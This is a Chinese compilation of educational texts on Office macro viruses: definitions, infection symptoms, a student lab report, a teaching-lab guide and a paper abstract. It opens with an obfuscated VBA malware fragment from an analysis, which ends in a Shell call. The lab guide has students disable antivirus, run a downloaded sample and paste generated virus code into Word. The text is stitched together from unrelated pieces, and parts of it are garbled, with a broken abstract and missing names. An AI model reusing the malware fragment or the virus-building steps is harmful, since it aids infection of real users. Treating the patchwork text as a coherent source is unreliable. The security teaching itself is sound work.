bYcfSuOhsf = FPmzKLZZjn171 nRRltsHOB = PtSrLGzLR172 KftEZiGv = Mid("ZOQB6ADEAMQA1AG0AOQGqcXPjVTGBVwHur", 2, 18)173 PcapUM = KftEZiGv174 CIoowrYFS = nUqoLNQZb175 CfjsS = Mid("pZPkhRPZtdoEjR3UWRwYAMQAxADIAWQAzADIAegA0ADMAegAzADIAbQAzADkASQA5ADIAegAzADkAIQAzADIAYgA0ADMAOgAzADIAJgAzADYAYgAxAoA", 21, 94)176 sbpNlLMLdC = CfjsS177 nHaoVpmlW = MEmKwaQjV178 haGppvzwpLm = Mid("MWhOm3Q1WQAxADEANgB+ADMAMgB7ADgAMwBJADEAMgAxAHsAMQAxADUASQAxADEANgB7v", 9, 59)179 wZkHuAqmza = haGppvzwpLm180Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + 181End Function⼦程序中⾸先调⽤了"DMSojZquJ"模块的"KlsJVlijz"函数，函数代码经过严重混淆，但是通过函数结尾的“Shell”关键字我们猜测病毒执⾏了某个程序或命令⾏。

办公软件中的宏和宏病毒一、宏病毒的定义宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

所谓“宏”可以理解为一些命令的集合，类似于DOS下的批处理文件，它能给文件的编辑带来许多方便。

宏病毒编制极其容易，微软的宏语言都是BASIC语言的子集。

宏病毒利用宏语言外部的例程的调用能力如使用Windows API函数，能进行任何操作。

一句话只要有应用程序支持解释，宏病毒无需改动即可在许多平台上运行。

二、宏病毒的分析Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，其在电脑中默认的安全级别为中，宏病毒正是利用这一点通过网络、u盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，对于操作者使用十分困难。

三、宏病毒感染后的特征“宏病毒”能在文件间复制自身的恶意宏程序，一般可以损坏或更改数据。

一旦打开沾染病毒的文档，其中的宏就会被执行，宏病毒会被激活，转移到计算机上，并驻留在Normal 模板上。

此后，所有自动保存的文档都会“感染”上这种宏病毒，感染后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，造成文件丢失，给用户带来许多麻烦。

Office软件运行缓慢，电脑经常死机等。

由于现在(QQ、126)邮件系统都集成防毒软件，在发送邮件时上传感染后的Office文档，邮件系统会提示文件发送失败。

如果其他用户打开了感染病毒的文档，宏病毒又会转移到其计算机上。

宏病毒可以跨平台传播，并且只要打开受感染文件就可以进行传播。

如果是在网络环境中，还会通过文件的共享、Internet上下载，传播并感染其他用户的计算机。

但是宏病毒有一个特点，就是同一种程序下编制的宏病毒，只能感染同一类型的文件，不同类型宏病毒不能交叉感染，即Word宏病毒不能感染Excel文件。

宏病毒实验报告一、实验目的本次实验旨在深入了解宏病毒的工作原理、传播方式以及其对计算机系统可能造成的危害，并通过实际操作和观察，探索有效的防范和清除策略。

二、实验环境1、操作系统：Windows 10 专业版2、办公软件：Microsoft Office 20193、杀毒软件：＿____杀毒软件三、实验原理宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

当打开包含宏病毒的文档时，宏病毒会被自动激活，并执行其中的恶意代码。

宏病毒通常利用 Office 软件中的宏功能来实现自我复制、传播和破坏操作。

四、实验步骤1、准备带有宏病毒的测试文档从网络上获取已知的含有宏病毒的示例文档。

对获取的文档进行备份，以防对实验环境造成不可恢复的破坏。

2、观察宏病毒的激活过程打开带有宏病毒的文档。

留意弹出的警告提示，记录相关信息。

3、分析宏病毒的行为观察文档中的内容是否被篡改。

检查计算机系统的性能是否受到影响，如 CPU 使用率、内存占用等。

4、尝试清除宏病毒使用安装的杀毒软件进行扫描和清除。

手动删除相关的宏代码。

五、实验结果与分析1、宏病毒激活情况打开测试文档时，Office 软件弹出了宏安全警告，但仍可以选择启用宏。

一旦启用宏，病毒立即开始执行恶意操作。

2、宏病毒的行为表现文档中的部分文本被修改，格式变得混乱。

CPU 使用率短时间内飙升，系统运行变得卡顿。

3、清除效果杀毒软件能够检测到宏病毒，并成功清除大部分感染，但仍有部分残留。

手动删除宏代码后，文档恢复正常，系统性能也逐渐恢复。

六、实验结论1、宏病毒具有较强的隐蔽性和破坏性，能够在用户不知情的情况下对文档和系统造成损害。

2、办公软件的宏安全设置对于防范宏病毒至关重要，用户应保持较高的安全意识，不轻易启用来源不明的宏。

3、杀毒软件在宏病毒的清除方面起到了一定的作用，但仍需不断更新病毒库和优化清除算法，以应对不断变化的宏病毒威胁。

4、定期备份重要的文档和数据是防范宏病毒造成严重损失的有效措施。

计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏，其代码主要是造成恶作剧，并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统：WINDOWS2000JDK版本：Java Standard Edition 1.4.0以上数据库：MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界，输入用户名和密码。

（注意：实验前先关闭所有杀毒软件。

）1.病毒感染实验由于该病毒特征码明显，因此请首先将病毒防火墙关闭，将系统时间调整到13日。

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒感染实验”，要根据要求和提示操作配置客户端的邮件地址，如下图3-2-1所示。

根据提示下载提供的台湾No.1病毒，亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒代码分析”，可以分析页面中的台湾No.1病毒源代码，根据相关代码分析，填写页面中空白的参数，点击确定系统将自动生成代码。

新建一个word文档作为自己编写的该病毒文件，然后把生成的代码复制并粘帖至Word自带的VBA编译工具中，可以参照美丽莎宏病毒实验中的图4-3至4-4 。

将自行编制的病毒备份待用。

3.杀毒实验进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“杀毒实验”，学习病毒防范方法，根据系统页面上的提示，使用手动杀毒，并写入实验报告中。

电脑病毒宏病毒作用机制及预防介绍Word宏病毒是一些制作病毒的专业人员利用MicrosoftWord的开放性即Word中提供的WordBASIC编程接口，下面由店铺给你做出详细的电脑病毒宏病毒作用机制及预防介绍!希望对你有帮助!欢迎回访店铺网站，谢谢!电脑病毒宏病毒作用机制及预防介绍：制作的一个或多个具有病毒特点的宏，它能通过.DOC文档及.DOT模板进行自我复制及传播。

宏病毒与以往的计算机病毒不同，它是感染微软Word文档文件.DOC和模板文件.DOT等的一种专向病毒。

宏病毒与以往攻击DOS和Windows文件的病毒机理完全不一样，它以VB(WORDBASIC)高级语言的方式直接混杂在文件中，并加以传播，不感染程序文件，只感染文档文件。

也许有人会问：MicrosoftWordforWindows所生成的.DOC文件难道不是数据文件吗?回答既是肯定的又是否定的。

.DOC文件是一个代码和数据的综合体。

虽然这些代码不能直接运行在x86的CPU上，但是可以由Word解释执行操作，因此他们的结果是一样的。

宏病毒是针对微软公司的字处理软件Word编写的一种病毒。

微软公司的字处理软件是最为流行的编辑软件，并且跨越了多种系统平台，宏病毒充分利用了这一点得到恣意传播。

Word的文件建立是通过模板来创建的，模板是为了形成最终文档而提供的特殊文档，模板可以包括以下几个元素：菜单、宏、格式(如备忘录等)。

模板是文本、图形和格式编排的蓝图，对于某一类型的所有文档来说，文本、图像和格式编排都是类似的。

Word提供了几种常见文档类型的模板，如备忘录、报告和商务信件。

您可以直接使用模板来创建新文档，或者加以修改，也可以创建自己的模板。

一般情况下，Word自动将新文档基于缺省的公用模板(Normal.dot)。

可以看出，模板在建立整个文档中所起的作用，作为基类，文档继承模板的属性，包括宏、菜单、格式等。

WORD处理文档需要同时进行各种不同的动作，如打开文件、关闭文件、读取数据资料以及储存和打印等等。

宏病毒的分析与防治摘要：作为软件的重要组成部分，其强大的数据分析、统计处理和决策支持能力得到人们的喜爱，并在各个领域被广泛使用。

正是如此，它也成为宏病毒最主要的侵害对象之一。

因此研究宏病毒机理和反宏病毒技术，以便更好地对宏病毒的传播进行控制和预防意义重大。

关键词：宏；计算机病毒；宏病毒( 116036, ): ,'s . ,a . ,, .: ; ;宏病毒的起源随着电子计算机科学技术的飞速发展，计算机已广泛应用在日常生活中，与此同时互联网也在世界上迅速普及，计算机及网络技术的迅猛发展给人们的工作和生活带来了前所未有的便利和效率，同时也给计算机病毒特别是微软办公套装软件中宏病毒的蔓延提供了方便。

作为软件的重要组成部分，其强大的数据分析，统计处理和决策支持能力得到人们的喜爱，并在各个领域被广泛使用，它也成为宏病毒最主要的侵害对象。

当病毒的先驱者们痴迷于他们高超的汇编语言技术所带来的破坏时，可能不会想到影响力更大的病毒会被后继者们以更加简单的手法制作出来。

宏病毒就是其中最具有代表性的范例之一。

宏病毒的出现并非出乎人们的意料，早在 80 年代后期就有专家预言过。

那时，有些学生就用某些应用程序的宏语言编写病毒。

1996 年12 月13日，一种被称“.1”的病毒同时在北京和深圳被发现，一例来自于的下载文件，另一例来自某医院的一项合作协议书,这就是宏病毒的起源。

随着计算机网络技术的不断发展，宏病毒也在不停更新，对的攻击也日益严重。

虽然各反病毒厂商都采用了各具特色的方法来抵御宏病毒，但新的宏病毒依然层出不穷，而旧的宏病毒变种也不断再次浮出水面。

这给人们反病毒的工作带来了全新的挑战。

资源共享的需求和计算机及网络技术的飞速发展，给宏病毒的传播提供了便利的条件，同时也给计算机系统的稳定带来了一定的影响。

针对日益严重的宏病毒问题，本文专门对宏病毒的机理和防治进行了研究，介绍了宏病毒，阐述宏病毒特点及危害。

分析宏病毒原理后进行宏病毒作用实验，针对查、杀当前流行宏病毒，提出自己的见解，并形成解决方案和防治措施。

宏病毒分析一、宏病毒简介宏，就是软件设计者为了在使用软件工作时，避免一再的重复相同的动作而设计出来的一种工具。

它利用简单的语法，把常用的动作写成宏，当再工作时，就可以直接利用事先写好的宏自动运行，去完成某项特定的任务，而不必再重复相同的动作。

宏病毒是一种寄存在文档或模板的宏中计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后所以自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

宏病毒正式利用了在Word和其他办公软件如Excel中所具有的宏特征进行病毒感染，本质上，它是嵌入到字处理文档或其他类型文件中的一段可执行代码。

二、宏病毒特点（1）、宏病毒的主要破坏○1．对WORD运行的破坏是：不能正常打印；封闭或改变文件存储路径；将文件改名；乱复制文件；封闭有关菜单；文件无法正常编辑。

○2．对系统的破坏是：Word Basic语言能够调用系统命令，造成破坏。

（2）、宏病毒隐蔽性强，传播迅速，危害严重，难以防治与感染普通.EXE或.COM文件的病毒相比，Word宏病毒具有隐蔽性强，传播迅速，危害严重，难以治愈等特点。

（3）、宏病毒具体表现○1．隐蔽性强由于人们忽视了在传递一个文档时也会有传播病毒的机会。

○2．毒传播迅速因为办公数据的交流要比拷贝.EXE文件更加经常和频繁，如果说扼制盗版可以减少普通.EXE或.COM病毒传播的话，那么这一招对Word病毒将束手元策。

○3．危害严重无数的DOC文件从上级机关传播到基层，基层又上报到上级机关，从各个单位的办公室到工作者的家庭，到出版部门的计算机系统。

于是，便存在这样一种可能，当成千上万的计算机系统在传播和复制这些数据以及文档文件的同时，也在忠实地传播和复制这些病毒。

由于该病毒能跨越多种平台，并且针对数据文档进行破坏，因此具有极大的危害性，该病毒在公司通过内联网相互进行文档传送时，迅速蔓延，往往很快就能使公司的机器全部染上病毒。